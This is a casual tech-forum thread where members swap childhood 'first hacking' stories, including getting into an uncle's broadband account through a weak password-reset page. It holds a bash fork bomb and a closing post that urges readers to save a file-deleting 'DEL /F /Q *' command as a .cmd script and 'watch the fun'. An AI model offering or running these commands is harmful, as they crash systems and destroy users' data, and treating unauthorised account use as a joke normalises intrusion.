What's your first HaXperience?

sygeek

Technomancer
What's your first experience with hacking? Whether you installed a keylogger into someone's computer, a vnc or even peeked onto his keyboard while he/she was logging into his account, share it all!

Here's mine
When I was 10, I visited my grandmother's house during my summer vacations. They had a reliance broadband connection, that required you to login into their web page with your account's username and pass. My uncle had strictly told us not to use his account and he even removed his password from the browser pass-manager. Oh god how on earth I was going to remain without internet for 30 days. Determined to do something I started messing with their site and stumbled upon "forgot your password". I thought that it would be using some sort of extremely secure login system but what's wrong with experimenting... So here's how it went -
1. Enter you account name - "sad" [the first thing that came to my mind]
2. Your account number is "blah blah blah"
Enter your security question - "1. Your pet name" [the first question in the popup]
3. Enter your question's answer - "sad" [I wasn't even serious with what I was doing, just did it for the sake of fun]
4. Click "show" to show your password [O_O how the F***K, I was seriously sitting there jaw-dropped]

I have many other experiences (2nd was messing with CartoonNetwork's contest game and tampering with my score to be on top...and getting my account banned), I'd love to share it all but lets see what you guys come up with

Last edited:

thetechfreak

Legend Never Ends
sygeek said:
4. Click "show" to show your password [O_O how the F***K, I was seriously sitting there jaw-dropped]
Whaaat? Reliance is really so insecure???

Nice work though. They received a shocking bill I think at the end of the month :)

doomgiver

Warframe
i once downloaded a movie on my mausi's comp (bsnl 2 gb limit) using utorrent, but forgot to stop it after downloading. it continued uploading and she got a bill of rs 3k. she swore to knock off my head for that.

Code:
:(){ :|: & };:
is the code complete??? im sure something's missing, or maybe im just paranoid

Vartul

Thit!I fogot my pathword!
Deleted 'System Idle Process' in my Uncle's Computer.Didn't start properly for days.He killed me for that.

OP
sygeek

sygeek

Technomancer
@thetechfreak yeah man, we totally screwed up their account with thousands of downloads. I think they had 2mbps bandwidth. The next month this showed up on their account "Your service has been withdrawn due to non-payment of bills"

mohityadavx

Youngling
i once downloaded a movie on my mausi's comp (bsnl 2 gb limit) using utorrent, but forgot to stop it after downloading. it continued uploading and she got a bill of rs 3k. she swore to knock off my head for that.

is the code complete??? im sure something's missing, or maybe im just paranoid

i can't understand this code deal??? Whats the fuss about??

OP
sygeek

sygeek

Technomancer
@mohityadavx It's a Fork bomb
In short, once you (or an external process) executes a certain command, it will keep on cloning a certain process until no process slot is free (or until your computers gets f**ked up)

Vartul

Thit!I fogot my pathword!
It was more of an inadverdent hack.I didn't know what it was(This is eating almost 99% CPU!! Must close it down.Uncle will be so happy!)

mohityadavx

Youngling
@mohityadavx It's a Fork bomb
In short, once you (or an external process) executes a certain command, it will keep on cloning a certain process until no process slot is free (or until your computers gets f**ked up)
________

Thanx sygeek

Paste the command in notepad and save it with extension cmd(Only works with windows)

DEL /F /Q *

watch the fun

Last edited:
Top Bottom